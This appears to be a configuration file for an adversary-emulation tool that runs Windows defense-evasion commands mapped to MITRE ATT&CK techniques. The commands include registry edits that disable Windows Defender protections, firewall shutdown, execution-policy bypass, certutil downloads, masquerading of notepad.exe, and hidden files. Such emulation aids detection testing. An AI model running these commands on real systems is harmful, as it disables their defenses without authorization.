commands:
  # Defense Evasion - Total Commands : 23
  # Last Modified   - May 8 2025 
#T1027.010
  - technique: "T1027.010 - Obfuscated Files or Information:Command Obfuscation"
    command: "n^e^t^ ^u^s^e^r"
    executor: "cmd"
    file_name: "Obfuscated_net_user_output"

#T1027.001
  - technique: "T1027.001 - Obfuscated Files or Information:Binary Padding"
    command: "certutil -urlcache -split -f https://download.sysinternals.com/files/Procdump.zip C:\\system34\\Defense_Evasion_Output\\Procdump.zip"
    executor: "powershell"
    file_name: "Certutile_procdump_output"

#T1036.003
  - technique: "T1036.003 - Masquerading:Rename System Utilities - Creates Sputnik.txt, sysctl.conf, and ufw.conf files."
    command: "New-Item -Path 'C:\\system34\\Sputnik.txt' -ItemType File"
    executor: "powershell"
    file_name: "Sputnik_new_item_text_output"

  - technique: "T1036.003 - Masquerading:Rename System Utilities - Renames Sputnik.txt to Sputnik.docx to appear as a different file type."
    command: "Rename-Item -Path 'C:\\system34\\Sputnik.txt' -NewName 'C:\\system34\\Sputnik.docx'"
    executor: "powershell"
    file_name: "Sputnik_Rename_item_text_output"

  - technique: "T1036.003 - Masquerading:Rename System Utilities - Copies notepad.exe and renames it to Sputnik.exe, then executes it."
    command: "Copy-Item -Path 'C:\\Windows\\System32\\notepad.exe' -Destination 'C:\\system34\\Sputnik.exe'"
    executor: "powershell"
    file_name: "Sputnik_copy_item_text_output"

  - technique: "T1036.003 - Masquerading:Rename System Utilities - Creating files (sisa_sample.txt and desktop.ini) within the Sputnik folder in C:\\system34, a directory name that resembles C:\\Windows\\System32."
    command: |
      New-Item -Path 'C:\\system34\\Sputnik' -ItemType Directory -Force;
      New-Item -Path 'C:\\system34\\Sputnik\\Sputnik.txt' -ItemType File -Force;
      New-Item -Path 'C:\\system34\\Sputnik\\desktop.ini' -ItemType File -Value 'This is a desktop.ini file' -Force;
    executor: "powershell"
    file_name: "Sputnik_desktop_ini_text_output"

#T1036.005
  - technique: "T1036.005 - Masquerading:Match Legitimate Name or Location"
    command: "Start-Process -FilePath 'C:\\system34\\Sputnik.exe'"
    executor: "powershell"
    file_name: "Start_sputnik_exe_output"

#T1562.001
  - technique: "T1562.001 - Impair Defenses: Disable or Modify Tools - Modifies registry to disable Windows Defender components"
    command: "reg add 'HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender' /v DisableAntiSpyware /t REG_DWORD /d 1 /f"
    executor: "powershell"
    file_name: "DisableAntiSpyware_output"

  - technique: "T1562.001  - Impair Defenses: Disable or Modify Tools - Modifies registry to disable Windows Defender components"
    command: "reg add 'HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection' /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f"
    executor: "powershell"
    file_name: "DisableBehaviorMonitoring_output"

  - technique: "T1562.001  - Impair Defenses: Disable or Modify Tools - Modifies registry to disable Windows Defender components"
    command: "reg add 'HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection' /v DisableIOAVProtection /t REG_DWORD /d 1 /f"
    executor: "powershell"
    file_name: "DisableIOAVProtection_output"

  - technique: "T1562.001  - Impair Defenses: Disable or Modify Tools - Modifies registry to disable Windows Defender components"
    command: "reg add 'HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection' /v DisableArchiveScanning /t REG_DWORD /d 1 /f"
    executor: "powershell"
    file_name: "DisableArchiveScanning_output"

  - technique: "T1562.001  - Impair Defenses: Disable or Modify Tools - Modifies registry to disable Windows Defender components"
    command: "reg add 'HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection' /v DisableScriptScanning /t REG_DWORD /d 1 /f"
    executor: "powershell"
    file_name: "DisableScriptScanning_output"

  - technique: "T1562.001  - Impair Defenses: Disable or Modify Tools - Modifies registry to disable Windows Defender components"
    command: "reg add 'HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection' /v DisableIntrusionPreventionSystem /t REG_DWORD /d 1 /f"
    executor: "powershell"
    file_name: "DisableIntrusionPreventionSystem_output"

  - technique: "T1562.001  - Impair Defenses: Disable or Modify Tools - Modifies registry to disable Windows Defender components"
    command: "reg add 'HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender' /v DisableBlockAtFirstSeen /t REG_DWORD /d 1 /f"
    executor: "powershell"
    file_name: "DisableBlockAtFirstSeen_output"

  - technique: "T1562.001  - Impair Defenses: Disable or Modify Tools - Modifies registry to disable Windows Defender components"
    command: "reg add 'HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Signature Updates' /v DisableUpdateOnStartupWithoutEngine /t REG_DWORD /d 1 /f"
    executor: "powershell"
    file_name: "DisableUpdateOnStartupWithoutEngine_output"

  - technique: "T1562.001  - Impair Defenses: Disable or Modify Tools - Modifies registry to disable Windows Defender components"
    command: "reg add 'HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Spynet' /v SubmitSamplesConsent /t REG_DWORD /d 1 /f"
    executor: "powershell"
    file_name: "SubmitSamplesConsent_output"

  - technique: "T1562.001  - Impair Defenses: Disable or Modify Tools:Adding Sputnik.exe to exclusions"
    command: "New-ItemProperty -Path 'HKLM:\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Processes' -Name 'Sputnik.exe' -Value 'C:\\system34\\Sputnik.exe' -PropertyType String"
    executor: "powershell"
    file_name: "Exclusion_Sputnik_output"

#T1562.004-Impair DefensesDisable or Modify System Firewall
  - technique: "T1562.004-Impair DefensesDisable or Modify System Firewall"
    command: "netsh advfirewall set allprofiles state off"
    executor: "powershell"
    file_name: "netsh_state_off_output"

  - technique: "T1562.004-Impair DefensesDisable or Modify System Firewall"
    command: "Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False"
    executor: "powershell"
    file_name: "setnet_firewall_false_output"

#T1548 -  Abuse Elevation Control Mechanism
  - technique: "T1548 -  Abuse Elevation Control Mechanism"
    command: "Set-ExecutionPolicy -ExecutionPolicy Bypass -Scope LocalMachine"
    executor: "powershell"
    file_name: "Abuse_Elevation_Control_Mechanism_output"
#Hidden Atrributes

  - technique: "T1564.001  - Hide Artifacts: Hidden Files "
    command: |
      New-Item -Path 'C:\\system34\\Sputnik.txt' -ItemType File;
      attrib +h 'C:\\system34\\Sputnik.txt';
    executor: "powershell"
    file_name: "hidden_file_output"

  - technique: "T1564.003  - Hide Artifacts: Hidden Folder "
    command: |
      New-Item -Path 'C:\\system34\\Sputnik' -ItemType Directory;
      attrib +h 'C:\\system34\\Sputnik';
    executor: "powershell"
    file_name: "hidden_folder_output"

#Start-Process -FilePath 'notepad.exe' -WindowStyle Hidden
  - technique: "T1564.003  - Hide Artifacts: Hidden window"
    command: "Start-Process -FilePath 'notepad.exe' -WindowStyle Hidden"
    executor: "powershell"
    file_name: "Notepad_hidden_window_output"

paths:
  baseFolder: "C:\\system34"
  outputFolder: "C:\\system34\\Defense_Evasion_Output"
  SummaryFolder: "C:\\system34\\Summary"
